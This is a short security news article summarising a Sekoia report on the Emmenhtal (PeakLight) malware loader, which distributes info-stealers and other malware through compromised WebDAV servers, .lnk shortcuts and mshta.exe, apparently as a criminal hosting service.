Emmenhtal Malware: Exploiting WebDAV for Malicious Payloads
Sekoia has released a report detailing a relatively new malware loader service known as Emmenhtal. The primary feature of this malware lies in its use of compromised WebDAV servers to host the payloads of its clients.
Emmenhtal, also referred to as PeakLight, distributes various types of malware, including info-stealers, across the globe. Since its emergence in December 2023, it has drawn significant attention from cybersecurity experts due to its stealthy approach. The loader operates entirely in-memory, making detection and analysis exceedingly difficult.
The Sekoia team investigated the infrastructure used to spread Emmenhtal and discovered that the malicious files are hosted on WebDAV servers. WebDAV, an extension of the HTTP protocol, allows file management on web servers, which serves legitimate purposes. However, cybercriminals are increasingly exploiting this technology for their malicious ends. In this scheme, users are redirected to a WebDAV server where malware is downloaded via specially crafted files such as “.lnk” shortcuts.
Particularly noteworthy is the method of propagation through the use of the legitimate system file “mshta.exe,” designed to execute HTML applications. The utilization of such trusted system files enables attackers to bypass security mechanisms and conceal their activities. Sekoia’s analysis revealed more than 100 WebDAV servers involved in distributing malicious files.
Additionally, the experts uncovered that various malware families, including SelfAU3, DarkGate, Amadey, and others, are disseminated through this infrastructure. This suggests that the infrastructure is likely offered as a service to other cybercriminals, providing the means to rent servers and tools for hosting and delivering malicious software.
For several months, Emmenhtal’s infrastructure has utilized the same autonomous systems (AS) to host WebDAV servers, indicating a potentially centralized nature to the operation. Among the AS used were companies like Terasyst Ltd and Zonata, suggesting reliable agreements with service providers.
Sekoia’s conclusions point to the likelihood that Emmenhtal’s infrastructure represents a commercial service operated by a cybercriminal group, offering an environment for the hosting and distribution of a wide range of malicious programs.
